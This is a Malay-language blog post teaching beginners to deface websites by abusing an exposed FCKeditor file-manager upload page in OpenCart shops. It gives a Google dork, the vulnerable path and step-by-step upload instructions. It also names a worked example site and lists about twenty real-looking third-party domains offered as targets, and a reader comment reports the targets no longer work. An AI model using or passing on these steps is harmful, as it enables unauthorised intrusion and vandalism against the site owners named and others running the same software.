Saya akan menunjukkan cara nk mendeface website melalui FCKeditor exploit
Cara ini bagus bagi beginner
Jom mula :-
Dork: :Powered by Opencart site:.com
:SUPORT BY OPENCART
Exploit: /admin/view/javascript/fckeditor/editor/filemanager/connectors/test.html
Pergi ke google.com..dan paste dork itu..
Dah dapat website yang mahu dideface..terus masukkan exploit..
Contoh :-
http://www.inputandanalysis.com/
Selepas masukkan exploit jadi mcm nie
http://www.inputandanalysis.com/admin/view/javascript/fckeditor/editor/filemanager/connectors/test.html
Tekan enter
Sekarang ikut step nie :-
1.Tukarkan Connectors daripada ASP ke PHP
2.Tekan choose file dan browse file .html korang
3.Upload file
Korang akan terima satu message "File uploaded with no error"...tekan jer ok..
kalau bende lain..tukar website lain :D
Sekarang tukar yang test.html pada link tu
http://www.inputandanalysis.com/admin/view/javascript/fckeditor/editor/filemanager/connectors/*test*.html
kepada
http://www.inputandanalysis.com/admin/view/javascript/fckeditor/editor/filemanager/connectors/NameFileKorang.html
Sekarang padam yang lain..highlight dari connectors sampai /admin..padam semua tu
http://www.inputandanalysis.com/NameFileKorang.html
Tekan enter
Selesai....
Contoh hasil :- http://www.inputandanalysis.com/xWhiteHexor.html
List yang tersedia untuk dideface *(ada yg oleh ada yg tidak boleh guna)
http://ruthsgarden.com/
http://www.utahflowers.net/
http://www.inlove.my/
http://megamall.com.pk/
http://stefanyboutique.com/
http://www.inputandanalysis.com/
http://www.virtualgeorge.info/
http://iphoneclone.biz/
http://amourcristallis.com/
http://www.eesnet.org/
http://www.schoolshopper.com.au/
http://www.mymaxi.nl/
http://wiretek.net/
http://shop.tjokgus.com/
http://www.aquariumsystem.it/
http://uae-shopper.com/
http://organicjewelries.com/
http://www.granmasantiques.com/
http://avocadogenie.com/
http://www.utahflowers.net/
http://stefanyboutique.com/
http://amourcristallis.com/
1 comments:
Not found semua gan
Post a Comment